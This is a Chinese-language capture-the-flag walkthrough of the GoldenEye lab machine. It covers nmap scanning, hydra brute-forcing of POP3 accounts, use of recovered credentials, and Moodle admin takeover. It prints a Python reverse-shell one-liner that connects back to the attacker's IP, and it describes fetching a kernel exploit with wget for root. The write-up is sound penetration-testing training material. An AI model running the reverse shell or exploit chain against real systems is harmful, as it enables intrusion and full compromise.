一、主机发现
使用netdiscover
进行发现,IP为192.168.203.151
二、端口扫描
root@kali:~# nmap -sS -A 192.168.203.151 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:47 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.151
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
| https://www.ietf.org/rfc/rfc2246.txt
|
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://weakdh.org
| https://www.securityfocus.com/bid/74733
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.7:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
MAC Address: 00:0C:29:BD:2F:E3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.203.151
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 389.82 seconds
感觉没多少东西,就又扫了一遍全端口:
root@kali:~# nmap -sS -p1-65535 192.168.203.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:54 EST
Nmap scan report for 192.168.203.151
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
MAC Address: 00:0C:29:BD:2F:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds
由此,服务器共开放了25
、80
、55006
、55007
.
25
端口为SMTP服务器所开放,主要用于发送邮件。
三、漏洞寻找
先访问web服务:
提示我们去/sev-home/
目录下登录:
提示需要用户名密码,登录。
进行目录扫描,查找敏感信息:
未发现敏感信息。
继续查找,最终在源代码中发现线索:
得到用户名以及加密的密码:
Boris
InvincibleHack3r
该编码是实体编码,在此网站进行解密:https://c.runoob.com/front-end/691
得到密码为InvincibleHack3r
。
拿着账号密码去登陆,发现登陆不上,后来将Boris
改为小写即可登陆成功。
给GNO
发送邮件?并且,POP3
服务放置在非默认的高端口。
查看该页的源代码,又得到信息:
Qualified GoldenEye Network Operator Supervisors:
Natalya
Boris
之前我们探测到了两个高端口,但是不知道哪一个是POP3
服务,我们再使用Nmap探测一下:
可以看到55007
端口为POP3
服务:
接下来,利用hydra
爆破POP3
服务:
由于两个用户名一起爆破可能会产生错误的原因,我们对账号一个一个爆破。
我们得到了两个账号密码:
natalya password: bird
boris password: secret1!
我们使用nc
连接服务:
POP3的基础命令:
user #认证用户名
pass #认证密码
stat #返回邮件数、 邮件总字节数
list #返回指定邮件的大小
retr n #返回邮件的全部文本
依次查看三封邮件的内容:
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages….
通过这句话,可以看到Xenia
是一个关键任务。
我们再登录natalya
的服务看一下:
在第二封邮件的内容中得到xenia
的账号密码,并要求我们修改hosts文件。severnaya-station.com/gnocertdir
接下访问域名登录,并输入xenia的账号密码:
根据网站的图标判断该CMS为moodle
,于是去searchsploit
查找是否存在漏洞:
查到不少,再根据Blog处的标识,判断该网站的版本:
好像并没有太贴近的exp。
再找找别的线索,便发现了自己收到的一封邮件:
我们再利用hydra爆破doak,得到密码为goat
:
登录doak的pop3服务:
在邮件中得到他的账号和密码,并进行登录:
username: dr_doak
password: 4England!
在doak的个人文件中发现了一个文件:
打开之后,发现一个图片路径:/dir007key/for-007.jpg
就是这张照片:
我们利用strings
分析一下:
base64解密得到xWinter1995x!
,这应该就是admin的密码了,拿去登录:
登录成功,可见admin账号的功能就是多啊。
四、获取shell
找到如下位置,替换其中代码,利用python反弹shell:
代码如下:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.203.149",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
编辑一个blog,点击其中的图标,即可反弹shell成功:
但是第一次没有反弹成功,看了网上大佬的操作,才知道要进行如下修改,将其修改为PSpellShell
:
获取shell成功:
五、提权
在获取交互shell之后,发现双重字符,我们再反弹一个shell即可:
提权使用内核提权:
我们将其在searchsploit
中进行查询:
我们使用该脚本进行提权:
由于目标机器中没有gcc
,所以我们可以使用cc
:
将exp中的gcc进行修改:
修改完成之后,我们在kali开启web服务:python -m SimpleHTTPServer 8080
在目标机器上使用wget
下载脚本,并使用cc
编译,cc -o exp 37292.c
:
最后,我们给生成的exp赋权限,执行,提权成功,得到flag!